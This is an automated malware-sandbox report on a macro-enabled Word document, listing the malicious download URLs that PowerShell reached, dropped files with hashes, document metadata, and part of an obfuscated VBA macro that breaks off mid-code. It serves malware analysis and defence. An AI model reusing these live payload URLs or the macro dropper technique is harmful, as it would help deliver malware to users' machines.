    http://itomsystem.in/i9eg3y/nNpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.caboturnup.cpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://staviancjs.com/wp-forum/QOm4n2/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://www.%s.comPApowershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    https://staviancjs.com/wp-forum/QOm4powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://itomsystem.in/i9eg3y/nNxmmn9aTcv/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://alfadandoinc.com/67oyp/C2J2KyCpQnpowershell.exe, 00000004.00000002.430534978.0000000003AB5000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PEpowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://thepilatesstudionj.com/wppowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.caboturnup.com/wp-content/ppowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgpowershell.exe, 00000004.00000002.427876322.000000000311C000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://staviancjs.copowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:526179
    Start date:22.11.2021
    Start time:10:54:26
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 0s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:1711.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.winDOC@5/13@0/0
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 1
    • Number of non-executed functions: 1
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
    • Execution Graph export aborted for target powershell.exe, PID 2840 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    10:54:22API Interceptor55x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4114E8B1.png
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):121507
    Entropy (8bit):7.978393301250379
    Encrypted:false
    SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
    MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
    SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
    SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
    SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):41984
    Entropy (8bit):5.383636719226494
    Encrypted:false
    SSDEEP:768:In/plLQxx12HtK6z0D4J/pFLQxx12HtK6z0D:KlLQxx12HtK6z0UFLQxx12HtK6z0
    MD5:630161A7185DCB458C3A526CCD969ABB
    SHA1:9A9AFEAE4A07A818F707C584B29323335F508FCD
    SHA-256:4D9F1733C0B90882E54B3A36271659D8F3DA895A9A6E26FD130DA1F14A91964D
    SHA-512:92099AAF7E64C63C2A4678669F0367B10D0D474E8F710D22D0428D501D5C3FA3578D9602633E3235E0E1CD9A631B7EFDE12898EA5937176006C70723A37A7B44
    Malicious:false
    Reputation:low
    Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{31697AE2-9911-46AE-855C-FC6F84C9E570}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.6413622548786062
    Encrypted:false
    SSDEEP:6:rlEPgsn1F1YsuTyavlEtSYd9XwY2sQmh5epe8P+7WAeSTBFXZSuIehx:ePLF10yWEtSYW9oH8JAeOBBZSmX
    MD5:91473136D20E3046BECA18C78CE9BBE7
    SHA1:014B29FADC9F1EB72ADEBAB7A157BF9789953462
    SHA-256:7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
    SHA-512:4ABA8620775E931315BAE02D9F3C72188413831342C1BC67EC1F5C0FD37D0F662ABD04EBED5D3613CB8BAC159B87457BB87FCF4E6992262ABE4981B95EAAE5A0
    Malicious:false
    Reputation:low
    Preview: ../........... . . ... ... ..... . ..... . ... ......... . . ......... ........... . . ....... ... ... . ...........................................................................................................................................................................................................................................................................................................................................................................................................................................6...8...B...D...F...J...L...l...n...p...r...t...v...x...z...|.......................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4608109-7EE5-416E-A16B-050D4F8625B8}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:X:X
    MD5:32649384730B2D61C9E79D46DE589115
    SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
    SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
    SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ..
    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):147284
    Entropy (8bit):4.421624942731045
    Encrypted:false
    SSDEEP:1536:C8yL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CZJNSc83tKBAvQVCgOtmXmLpLmB
    MD5:62946DD1D4369B40AB7C43FFE49306F1
    SHA1:D820412F0CEFF346B60691EC53B0CFEC545240A0
    SHA-256:574017A6CD6121E24117AA16750044E473BEAB038466C6FC53FF50B7222BD78D
    SHA-512:E9C30A2DAB18805A3DD2A4C7AB8B175DB85713430A3BC1EF148D492A43154F1A3F033D40E4CEEAA2E9B81A0E3C24E4BF5C9FC63E9C9DBC46ADDF45A3AEB11F6C
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
    C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):55808
    Entropy (8bit):4.7353560135116135
    Encrypted:false
    SSDEEP:1536:z7ohjy3K6eGum/Cnps39t0UtXJTpzmFlZD:whjya6eGum/Cny1JTpz0H
    MD5:44F9CCBE595FE1B7BFD3E2A1140C56A0
    SHA1:C49C1A9814569DC6E95F87157A16D243DEA160A3
    SHA-256:318F746A4626DF1CE5F62D174620751B0418E7FFA7F847FFBBADB5433D096EE0
    SHA-512:24892FC86719306BBA3ABBE52DF64B77AD32ECD94DEC55A75AD54CD80C80A61E4C4C703135C7F7B83D16B58E820BC2ABC207BFE198F3506B744BEAAD39DE287B
    Malicious:false
    Yara Hits:
    • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, Author: Florian Roth
    Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................G....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...D...=...>...?...@...A...B...C...6...E...F.......i...I...J...O...L...M...N.......P...j...R...S...T...U...V...W...X...K...Z...[...\...]...^...g...`...a...b...c...d...e...f...Y...h...........k...............................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Mon Nov 22 17:54:15 2021, length=135948, window=hide
    Category:dropped
    Size (bytes):980
    Entropy (8bit):4.477890004940672
    Encrypted:false
    SSDEEP:12:8iW1gXg/XAlCPCHaXeBhB/OW9qX+WfY0tcPgicvb6MZUnDtZ3YilMMEpxRljKico:8ia/XTuzLI5YDeGMZ0Dv3qoQd7Qy
    MD5:1B2D29FE46309EB73F25961FA46345B9
    SHA1:38C4DD45673A3E5091D0BBE04F980A6A3089FBA9
    SHA-256:C583E5FF8FFC2C220BCC2F3F794EE2274B67E82F26165F28F6A152BDE458E72C
    SHA-512:E51CA5E2D222DF2F28DA05F78E3166846332AF27DF8E4AF314CCD35569B5311DC5D1910B522BDA82AF67422ACBC78C5B782F5BFD87BFE7626A922A78AD3312CF
    Malicious:false
    Preview: L..................F.... ...gu.?...gu.?....?.X.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....vS. .1711.doc..>.......S...S..*.........................1.7.1.1...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\1711.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.7.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):59
    Entropy (8bit):4.424791041423791
    Encrypted:false
    SSDEEP:3:bDuMJlYUdruYCmX1USXruYCv:bCs2Ms
    MD5:38B1B69A7D2D3E1C386BC4E37CB0A52B
    SHA1:F761BA2E5930369A2AE6B055664B1E06E53E3646
    SHA-256:EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
    SHA-512:CA698A65875D0DBAFBA21E6384ED97672BCFDBA0C20BA92EFF147139B938412D393C14A6F46C6BE13AC2F4DD0314F57C7BDF7DF76544D4269207234AA3874FFF
    Malicious:false
    Preview: [folders]..Templates.LNK=0..1711.LNK=0..[doc]..1711.LNK=0..
    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.5038355507075254
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
    Malicious:false
    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZU8F0KC83087BZI92TF.temp
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5819683626894125
    Encrypted:false
    SSDEEP:96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
    MD5:9F246B20B682C6FDB9E7E0679D09DE37
    SHA1:CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
    SHA-256:1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
    SHA-512:0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
    Malicious:false
    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msa (copy)
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5819683626894125
    Encrypted:false
    SSDEEP:96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
    MD5:9F246B20B682C6FDB9E7E0679D09DE37
    SHA1:CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
    SHA-256:1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
    SHA-512:0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
    Malicious:false
    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
    C:\Users\user\Desktop\~$1711.doc
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.5038355507075254
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
    Malicious:true
    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

    Static File Info

    General

    File type:Microsoft Word 2007+
    Entropy (8bit):7.953932715889731
    TrID:
    • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
    • Word Microsoft Office Open XML Format document (49504/1) 32.35%
    • Word Microsoft Office Open XML Format document (43504/1) 28.43%
    • ZIP compressed archive (8000/1) 5.23%
    File name:1711.doc
    File size:145337
    MD5:85ab297345c97bca1a5004dc537f6c1c
    SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
    SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
    SHA512:c5f246b510db5ba25b29338a5fc1182ac56738be51ebc6c8f5fb0e004a5b42e61fe69a304efcd5e000382609f1f524f329bd41322b5e5f67a986deea40cd4ec6
    SSDEEP:3072:hwQhXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDK3CXV:yeXw50+OukzVXV2uhDCxXV
    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea2aaa4b4b4a4

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Author:1
    Template:Normal.dotm
    Last Saved By:1
    Revion Number:39
    Total Edit Time:144
    Create Time:2021-11-15T15:39:00Z
    Last Saved Time:2021-11-16T19:13:00Z
    Number of Pages:1
    Number of Words:9
    Number of Characters:53
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:12.0000

    Streams with VBA

    VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859
    General
    Stream Path:VBA/bvkaeiku2ncoi2uho3ihdes
    VBA File Name:bvkaeiku2ncoi2uho3ihdes.cls
    Stream Size:9859
    Data ASCII:. . . . . . . . . ^ . . . . . . . . . . . . . . . j . . . b . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 01 00 01 f0 00 00 00 5e 07 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff 6a 07 00 00 62 19 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig()
    On Error Resume Next: Err.Clear
    InvoiceFolder$ = GetFolder(1, , "(look)")
    If InvoiceFolder$ = "" Then MsgBox "", vbCritical, "": Exit Sub
    ArchieveFolder$ = GetFolder(2, , ",")
    If ArchieveFolder$ = "" Then MsgBox ",", vbCritical, ",": Exit Sub
    Dim coll As Collection
    Set coll = FilenamesCollection(InvoiceFolder$, "?????? ?*??*.xls*", 1)
    If coll.Count = 0 Then
        MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, ""
        Exit Sub
    End If
    Dim pi As New ProgressIndicator: pi.Show "", , 2
    pi.StartNewAction , , , , , coll.Count
    Dim WB As Workbook, sh As Worksheet, ra As Range
    Application.ScreenUpdating = False
    For Each FileName In coll
        pi.SubAction "$index $count", ":" & Dir(FileName), "$time"
        pi.Log ":" & Dir(FileName)
        Set WB = Nothing: Set WB = Workbooks.Open(FileName, False, True)
        If WB Is Nothing Then
            pi.Log vbTab & "."
        Else
            Set sh = WB.Worksheets(1)
            Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp))
            shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize(, ra.Rows.Count).Value =             Application.WorksheetFunction.Transpose(ra.Value)
            WB.Close False: DoEvents
            pi.Log vbTab & "."
            Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal)
        End If
    Next
    pi.Hide: DoEvents: Application.ScreenUpdating = True
    MsgBox "", vbInformation
End Sub
Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf()
    On Error Resume Next: Err.Clear
    folder_1$ = GetFolder(1, , "")
    If folder_1$ = "" Then Exit Sub
    folder_2$ = GetFolder(2, , , folder_1$)
    If folder_2$ = "" Then Exit Sub
    folder_3$ = GetFolder(, True, "")
    If folder_3$ = "" Then Exit Sub
End Sub
Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 As String, ndr54 As Long, bvret As Long)
    Dim s1, s2, ra, glew, hkqwfsadesf, st As String
    Dim d, R As Double
